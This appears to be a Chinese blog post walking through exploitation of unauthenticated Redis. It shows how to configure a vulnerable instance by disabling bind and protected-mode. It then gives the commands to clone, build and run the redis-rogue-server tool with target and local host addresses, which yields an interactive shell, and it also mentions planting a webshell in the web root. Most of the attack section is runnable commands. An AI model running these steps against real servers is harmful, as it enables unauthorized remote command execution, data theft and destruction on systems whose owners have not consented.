Redis未授权访问反弹shell

0x01:前言

这是10月份写的文章 一直放到电脑上居然忘掉了 我丢!!

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。

Redis因配置不当可以未授权访问(窃取数据、反弹shell、数据备份操作主从复制、命令执行)。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。

 

0x02. 安装redis

 

wget http://download.redis.io/releases/redis-3.2.0.tar.gz

tar -xvzf redis-3.2.0.tar.gz

cd redis-3.2.0

make

0x03 修改配置文件

 

vim redis.conf

bind 127.0.0.1前面加上#号       # bind 127.0.0.1

protected-mode设为no         protected-mode no

 

启动redis-server    

./src/redis-service

默认的配置是使用6379端口,没有密码。这时候会导致未授权访问然后使用redis权限写文件!!

 

0x04 攻击利用

利用工具:https://github.com/n0b0dyCN/redis-rogue-server

git clone https://github.com/n0b0dyCN/redis-rogue-server.git

cd redis-rogue-server/RedisModulesSDK/exp

make

cd ../../

python3 redis-rogue-server.py --rhost  目标ip  --lhost 本地ip

 

成功建立连接 输入 i 得到一个交互式 Shell、可以直接输入命令

0x05  攻击利用x2

 

也可以在网站目录写入 webshell

 

直接访问 即可 !!

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章